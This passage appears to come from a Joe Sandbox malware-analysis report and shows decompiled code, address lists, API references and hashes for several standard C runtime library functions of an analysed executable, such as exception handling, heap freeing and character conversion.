				 *((intOrPtr*)(_t58 - 0x28)) = E004079A6(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00408BF1(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00407A4B(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040D36B(_t48, _t53, _t55, _t57, _t61);
				return E004094C5( *((intOrPtr*)(_t58 - 0x1c)));
			}








                    0x0040d245
                    0x0040d245
                    0x0040d247
                    0x0040d24c
                    0x0040d251
                    0x0040d253
                    0x0040d256
                    0x0040d259
                    0x0040d25c
                    0x0040d263
                    0x0040d274
                    0x0040d282
                    0x0040d290
                    0x0040d298
                    0x0040d2a6
                    0x0040d2ac
                    0x0040d2b3
                    0x0040d2b6
                    0x0040d2cc
                    0x0040d2cf
                    0x0040d344
                    0x0040d34b
                    0x0040d352
                    0x0040d35f

                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 0040D26D
                      • Part of subcall function 004079A6: __getptd.LIBCMT ref: 004079B4
                      • Part of subcall function 004079A6: __getptd.LIBCMT ref: 004079C2
                    • __getptd.LIBCMT ref: 0040D277
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040D285
                    • __getptd.LIBCMT ref: 0040D293
                    • __getptd.LIBCMT ref: 0040D29E
                    • _CallCatchBlock2.LIBCMT ref: 0040D2C4
                      • Part of subcall function 00407A4B: __CallSettingFrame@12.LIBCMT ref: 00407A97
                      • Part of subcall function 0040D36B: __getptd.LIBCMT ref: 0040D37A
                      • Part of subcall function 0040D36B: __getptd.LIBCMT ref: 0040D388
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: ec31f0ee46d81a317718e44662539a2bb57a752aafd447310979ada468aa2085
                    • Instruction ID: 8dbbb1d19d37c023a1572d48ec851b1baeccfae569e00c14c3edc3fd44107886
                    • Opcode Fuzzy Hash: ec31f0ee46d81a317718e44662539a2bb57a752aafd447310979ada468aa2085
                    • Instruction Fuzzy Hash: B1110AB1D04209DFDB00EFA5C546ADDB7B0FF04314F10846EF854A7292DB389A159F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CF94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                    Download Yara Rule
                    C-Code - Quality: 52%
                    			E0040CF94(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				intOrPtr* _t15;
				intOrPtr* _t18;
				void* _t22;

				_t24 = __edi;
				_t23 = __edx;
				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00408BF1(_t22, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00408BF1(_t22, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L9;
				} else {
					__eflags = __eax - 0xe06d7363;
					if(__eflags != 0) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						 *(E00408BF1(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
						_push(8);
						_push(0x418100);
						E00409480(_t22, __edi, __esi);
						_t18 =  *((intOrPtr*)(E00408BF1(_t22, __edx, _t30) + 0x78));
						if(_t18 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t18();
							_v8 = 0xfffffffe;
						}
						return E004094C5(E0040B345(_t22, _t23, _t24));
					}
				}
			}








                    0x0040cf94
                    0x0040cf94
                    0x0040cfa0
                    0x0040cfa5
                    0x0040cfc4
                    0x0040cfcb
                    0x0040cfd2
                    0x0040cfd7
                    0x0040cfd7
                    0x0040cfd7
                    0x00000000
                    0x0040cfa7
                    0x0040cfa7
                    0x0040cfac
                    0x0040cfd9
                    0x0040cfd9
                    0x0040cfdc
                    0x0040cfae
                    0x0040cfb3
                    0x00406f8a
                    0x00406f8c
                    0x00406f91
                    0x00406f9b
                    0x00406fa0
                    0x00406fa2
                    0x00406fa6
                    0x00406fb1
                    0x00406fb1
                    0x00406fc2
                    0x00406fc2
                    0x0040cfac

                    APIs
                    • __getptd.LIBCMT ref: 0040CFAE
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040CFBF
                    • __getptd.LIBCMT ref: 0040CFCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$csm
                    • API String ID: 803148776-1389381023
                    • Opcode ID: b3493c5c61a86f34dbd88dc2e54a74ec28ef5841e110d946c934a748e88883d4
                    • Instruction ID: b817c59e2ff2b00f7bfd91d48eda6a7b39b0a1c60efee0b81e92e7cb3a07f843
                    • Opcode Fuzzy Hash: b3493c5c61a86f34dbd88dc2e54a74ec28ef5841e110d946c934a748e88883d4
                    • Instruction Fuzzy Hash: BEE01A75500105CFC710ABA9C186B2933A6EB48319F5909BBF44DE73E3DB7CE950AA4B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00410158 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00410158(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x418520);
				E00409480(__ebx, __edi, __esi);
				_t31 = E00408BF1(__ebx, __edx, _t35);
				_t15 =  *0x41aed8; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040E117(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x41add0; // 0xb91610
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x41a9a8;
								if(__eflags != 0) {
									_push(_t33);
									E00408391(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x41add0; // 0xb91610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x41add0; // 0xb91610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004101F3();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040C2BD(_t29, 0x20);
				}
				return E004094C5(_t33);
			}










                    0x00410158
                    0x00410158
                    0x00410158
                    0x00410158
                    0x0041015a
                    0x0041015f
                    0x00410169
                    0x0041016b
                    0x00410173
                    0x00410194
                    0x0041019a
                    0x0041019e
                    0x004101a1
                    0x004101a4
                    0x004101aa
                    0x004101ac
                    0x004101ae
                    0x004101b1
                    0x004101b7
                    0x004101b9
                    0x004101bb
                    0x004101c1
                    0x004101c3
                    0x004101c4
                    0x004101c9
                    0x004101c1
                    0x004101b9
                    0x004101ca
                    0x004101cf
                    0x004101d2
                    0x004101d8
                    0x004101dc
                    0x004101dc
                    0x004101e2
                    0x004101e9
                    0x0041017b
                    0x0041017b
                    0x0041017b
                    0x00410180
                    0x00410184
                    0x00410189
                    0x00410191

                    APIs
                    • __getptd.LIBCMT ref: 00410164
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __amsg_exit.LIBCMT ref: 00410184
                    • __lock.LIBCMT ref: 00410194
                    • InterlockedDecrement.KERNEL32(?), ref: 004101B1
                    • InterlockedIncrement.KERNEL32(00B91610), ref: 004101DC
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                    • String ID:
                    • API String ID: 4271482742-0
                    • Opcode ID: 0ae42d1af5b45461503a632c2f752f2cfab7af00a2c38ef18795a6d473f346cf
                    • Instruction ID: de8b3edfefe574bfed8f34b7f7893f6631444417f3520d658e7e7bb1693974ed
                    • Opcode Fuzzy Hash: 0ae42d1af5b45461503a632c2f752f2cfab7af00a2c38ef18795a6d473f346cf
                    • Instruction Fuzzy Hash: 4201A132902711ABC712AB6598057CE7360BB04725F14812BF800776D1CBBDADD1DBCE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408391 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E00408391(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4181c8);
				_t8 = E00409480(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E004094C5(_t8);
				}
				if( *0x480164 != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x47ef44, 0, ??) == 0) {
						_t10 = E00407E97();
						 *_t10 = E00407E55(GetLastError());
					}
					goto L9;
				}
				E0040E117(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040E14A(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040E17A();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E004083E7();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                    0x00408391
                    0x00408393
                    0x00408398
                    0x0040839d
                    0x004083a2
                    0x00408419
                    0x0040841e
                    0x0040841e
                    0x004083ab
                    0x004083f0
                    0x004083f1
                    0x00408401
                    0x00408403
                    0x00408416
                    0x00408418
                    0x00000000
                    0x00408401
                    0x004083af
                    0x004083b5
                    0x004083ba
                    0x004083c0
                    0x004083c5
                    0x004083c7
                    0x004083c8
                    0x004083c9
                    0x004083cf
                    0x004083d0
                    0x004083d7
                    0x004083e0
                    0x00000000
                    0x004083e2
                    0x004083e2
                    0x00000000
                    0x004083e2

                    APIs
                    • __lock.LIBCMT ref: 004083AF
                      • Part of subcall function 0040E117: __mtinitlocknum.LIBCMT ref: 0040E12D
                      • Part of subcall function 0040E117: __amsg_exit.LIBCMT ref: 0040E139
                      • Part of subcall function 0040E117: EnterCriticalSection.KERNEL32(?,?,?,0041497B,00000004,004186A8,0000000C,00410670,?,?,00000000,00000000,00000000,?,00408BA3,00000001), ref: 0040E141
                    • ___sbh_find_block.LIBCMT ref: 004083BA
                    • ___sbh_free_block.LIBCMT ref: 004083C9
                    • HeapFree.KERNEL32(00000000,?,004181C8,0000000C,0040E0F8,00000000,00418480,0000000C,0040E132,?,?,?,0041497B,00000004,004186A8,0000000C), ref: 004083F9
                    • GetLastError.KERNEL32(?,0041497B,00000004,004186A8,0000000C,00410670,?,?,00000000,00000000,00000000,?,00408BA3,00000001,00000214), ref: 0040840A
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2714421763-0
                    • Opcode ID: 41028ddc3cd4b07aad9b2cba660ac9ec1c66c9dd65b33da2e68891c717245daf
                    • Instruction ID: 22cb6e104ee26a05c1c6c528a598d7dae73e29afa4cc1c2644510d068b8e4df0
                    • Opcode Fuzzy Hash: 41028ddc3cd4b07aad9b2cba660ac9ec1c66c9dd65b33da2e68891c717245daf
                    • Instruction Fuzzy Hash: 53014F31905312AADF206B72AE06B5F3A649F40B68F10057FF454BA1D2DF3D99409A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D5F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 24%
                    			E0040D5F2(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040D560(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E004076FE(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0040CFDD(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0040D245(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
				if(_t20 != 0) {
					E004076B7(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                    0x0040d5f2
                    0x0040d5f2
                    0x0040d5f2
                    0x0040d5f7
                    0x0040d5fb
                    0x0040d5fd
                    0x0040d600
                    0x0040d601
                    0x0040d602
                    0x0040d605
                    0x0040d60a
                    0x0040d60a
                    0x0040d60d
                    0x0040d611
                    0x0040d614
                    0x0040d619
                    0x0040d616
                    0x0040d616
                    0x0040d616
                    0x0040d61c
                    0x0040d621
                    0x0040d623
                    0x0040d626
                    0x0040d629
                    0x0040d62a
                    0x0040d632
                    0x0040d637
                    0x0040d63b
                    0x0040d63e
                    0x0040d641
                    0x0040d647
                    0x0040d648
                    0x0040d64b
                    0x0040d655
                    0x0040d659
                    0x00000000
                    0x0040d659
                    0x0040d65f

                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 0040D605
                      • Part of subcall function 0040D560: ___BuildCatchObjectHelper.LIBCMT ref: 0040D596
                    • _UnwindNestedFrames.LIBCMT ref: 0040D61C
                    • ___FrameUnwindToState.LIBCMT ref: 0040D62A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm
                    • API String ID: 2163707966-1018135373
                    • Opcode ID: b4d94f597d3ad86545263278c3b3b403363400864d43045d366ef1f28234a2c8
                    • Instruction ID: d35a8aa292447e6ee848d16faf3c13964287127bbe11df6dd513262f860d8648
                    • Opcode Fuzzy Hash: b4d94f597d3ad86545263278c3b3b403363400864d43045d366ef1f28234a2c8
                    • Instruction Fuzzy Hash: 2B012835800109BBCF126F92CC41EAB7F6AEF58358F044426BD18251A1DB3B99A1DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004124B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E004124B9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x403fb0;
					_v28 =  *0x403fa8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                    0x004124be
                    0x004124c6
                    0x004124dd
                    0x00412489
                    0x00412492
                    0x0041249e
                    0x004124a1
                    0x004124a4
                    0x004124a6
                    0x004124a9
                    0x004124ae
                    0x004124b8
                    0x004124b0
                    0x004124b4
                    0x004124b4
                    0x004124c8
                    0x004124ce
                    0x004124d6
                    0x00000000
                    0x004124d8
                    0x004124d8
                    0x004124dc
                    0x004124dc
                    0x004124d6

                    APIs
                    • GetModuleHandleA.KERNEL32(KERNEL32,0040ADDA), ref: 004124BE
                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004124CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: IsProcessorFeaturePresent$KERNEL32
                    • API String ID: 1646373207-3105848591
                    • Opcode ID: ee63b53c3bbb647226da7baed89e2ad2b98daf95e994082500fc9f6d6cffe820
                    • Instruction ID: a718abd4de27ec464f4a226fc57991b239694793ee379156b5c450683665b3fc
                    • Opcode Fuzzy Hash: ee63b53c3bbb647226da7baed89e2ad2b98daf95e994082500fc9f6d6cffe820
                    • Instruction Fuzzy Hash: 73F03031A00A0AE2DF001FA1BE0E6AFBE79BB80742F9105A1D5D1F00D4DF7481F5824A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00415A20 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00415A20(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040988F( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E0041188B( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00407E97();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}














                    0x00415a2a
                    0x00415a31
                    0x00415a48
                    0x00000000
                    0x00415a38
                    0x00415a3a
                    0x00415a54
                    0x00415a5f
                    0x00415a91
                    0x00415b2f
                    0x00415a6f
                    0x00415a72
                    0x00415a77
                    0x00415a77
                    0x00000000
                    0x00415a7d
                    0x00415af1
                    0x00415af1
                    0x00415af6
                    0x00415aff
                    0x00415b01
                    0x00415b04
                    0x00415b04
                    0x00000000
                    0x00415b08
                    0x00415a93
                    0x00415a96
                    0x00415a9f
                    0x00415ac6
                    0x00415acf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00415aa6
                    0x00415ab9
                    0x00415ac1
                    0x00415ac4
                    0x00415ad6
                    0x00415ad6
                    0x00415adf
                    0x00415a4d
                    0x00415a4d
                    0x00415ae8
                    0x00000000
                    0x00415ae8
                    0x00000000
                    0x00415ac4
                    0x00415a9f
                    0x00415a61
                    0x00415a66
                    0x00415a6c
                    0x00415a6c
                    0x00000000
                    0x00415a3c
                    0x00415a3c
                    0x00415a41
                    0x00415a45
                    0x00415a45
                    0x00000000
                    0x00415a41
                    0x00415a3a

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415A54
                    • __isleadbyte_l.LIBCMT ref: 00415A88
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004064C0,?,00000000,00000000,?,?,?,?,004064C0,00000000), ref: 00415AB9
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004064C0,00000001,00000000,00000000,?,?,?,?,004064C0,00000000), ref: 00415B27
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 6bbddb5c765605a2ee9faf2e327f1788629c22512bf335d802b0b67d74e5ce3c
                    • Instruction ID: 9b812e5c8a2dfed52fa7c33654fea10736fda5f2b97d3e828d9e3610f20b48e7
                    • Opcode Fuzzy Hash: 6bbddb5c765605a2ee9faf2e327f1788629c22512bf335d802b0b67d74e5ce3c
                    • Instruction Fuzzy Hash: 3C31B231A40646EFDB20DFA4C8D09FE3BB5BF81391F1886AAE4619B291D334DD80DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004123A5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004123A5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00411C96(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00411D86(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004122AB(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004121F0(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                    0x004123aa
                    0x004123b0
                    0x00412423
                    0x00000000
                    0x004123b7
                    0x004123b7
                    0x004123ba
                    0x004123d5
                    0x004123d8
                    0x004123f8
                    0x0041240a
                    0x004123da
                    0x004123da
                    0x004123dd
                    0x00000000
                    0x004123df
                    0x004123f1
                    0x004123f1
                    0x004123dd
                    0x00412428
                    0x0041242c
                    0x004123bc
                    0x004123d4
                    0x004123d4
                    0x004123ba

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
